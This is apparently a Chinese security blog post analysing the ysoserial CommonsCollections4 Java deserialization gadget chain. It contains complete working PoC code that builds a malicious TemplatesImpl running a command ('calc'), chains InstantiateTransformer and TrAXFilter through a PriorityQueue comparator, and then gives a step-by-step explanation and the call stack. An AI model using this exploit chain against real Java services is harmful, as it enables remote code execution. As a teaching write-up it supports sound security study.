『Java安全』反序列化-CC4反序列化漏洞POP链分析_ysoserial CommonsCollections4 PoC分析

前言

同样的,CC4是CC2的变种,改变同CC3用的是InstantiateTransformer而不是InvokerTransformer触发

需要Commons-Collections4 4.0

代码复现

工具类

生成恶意TemplatesImpl:

TemplatesGeneratorPacked/GetAbstractTranslet.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;

public class GetAbstractTranslet {
    public static byte[] generate() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("e");
        CtClass zuper = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(zuper);

        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        clazz.addConstructor(constructor);

        return clazz.toBytecode();
    }
}

TemplatesGeneratorPacked/GetTemplatesImpl.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import ReflectPacked.ValueGetterSetter;

public class GetTemplatesImpl {
    public static TemplatesImpl getTemplatesImpl() throws Exception{
        byte[][] bytes = new byte[][]{GetAbstractTranslet.generate()};

        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        ValueGetterSetter.setValue(templates, "_bytecodes", bytes);
        ValueGetterSetter.setValue(templates, "_name", "a");
        ValueGetterSetter.setValue(templates, "_tfactory", new TransformerFactoryImpl());

        return  templates;
    }
}


反射get/set:

ReflectPacked/ValueGetterSetter.java

package ReflectPacked;

import java.lang.reflect.Field;

public class ValueGetterSetter {
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static Object getValue(Object obj, String name) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        return field.get(obj);
    }
}


反序列化:

UnserializePacked.Unserialize.java

package UnserializePacked;

import java.io.*;

public class Unserialize {
    public static void unserialize(Object obj) throws Exception{
        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(obj);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

PoC

package cc.cc4;

import ReflectPacked.ValueGetterSetter;
import TemplatesGeneratorPacked.GetTemplatesImpl;
import UnserializePacked.Unserialize;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.util.PriorityQueue;

public class PoC {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();

        ConstantTransformer constantTransformer = new ConstantTransformer(String.class);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(
                new Class[]{String.class},
                new Object[]{"a"}
        );

        ChainedTransformer chainedTransformer = new ChainedTransformer(
                constantTransformer,
                instantiateTransformer);

        TransformingComparator comparator = new TransformingComparator(chainedTransformer);

        PriorityQueue queue = new PriorityQueue(2, comparator);
        queue.add(1);
        queue.add(1);

        ValueGetterSetter.setValue(constantTransformer, "iConstant", TrAXFilter.class);
        ValueGetterSetter.setValue(instantiateTransformer, "iParamTypes", new Class[]{Templates.class});
        ValueGetterSetter.setValue(instantiateTransformer, "iArgs", new Object[]{templates});

        Unserialize.unserialize(queue);
    }
}

代码审计 | 原理分析

思路是CC2和CC3的结合,这里只梳理流程

『Java安全』反序列化-CC2反序列化漏洞POP链分析_ysoserial CommonsCollections2 PoC分析
『Java安全』反序列化-CC3反序列化漏洞POP链分析_ysoserial CommonsCollections3 PoC分析

1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()

2. InstantiateTransformer.transform()调用指定的类构造器

3. TransformingComparator.compare()调用this.transformer.transform()

4. PriorityQueue反序列化调用comparator.compare()

POP链

newTransformer:439, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:57, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:526, Constructor (java.lang.reflect)
transform:116, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:32, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:112, ChainedTransformer (org.apache.commons.collections4.functors)
compare:81, TransformingComparator (org.apache.commons.collections4.comparators)
siftDownUsingComparator:699, PriorityQueue (java.util)
siftDown:667, PriorityQueue (java.util)
heapify:713, PriorityQueue (java.util)
readObject:773, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:57, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:606, Method (java.lang.reflect)
invokeReadObject:1017, ObjectStreamClass (java.io)
readSerialData:1893, ObjectInputStream (java.io)
readOrdinaryObject:1798, ObjectInputStream (java.io)
readObject0:1350, ObjectInputStream (java.io)
readObject:370, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:40, PoC (cc.cc4)

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123448990
版权声明:本文为原创,转载时须注明出处及本声明

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值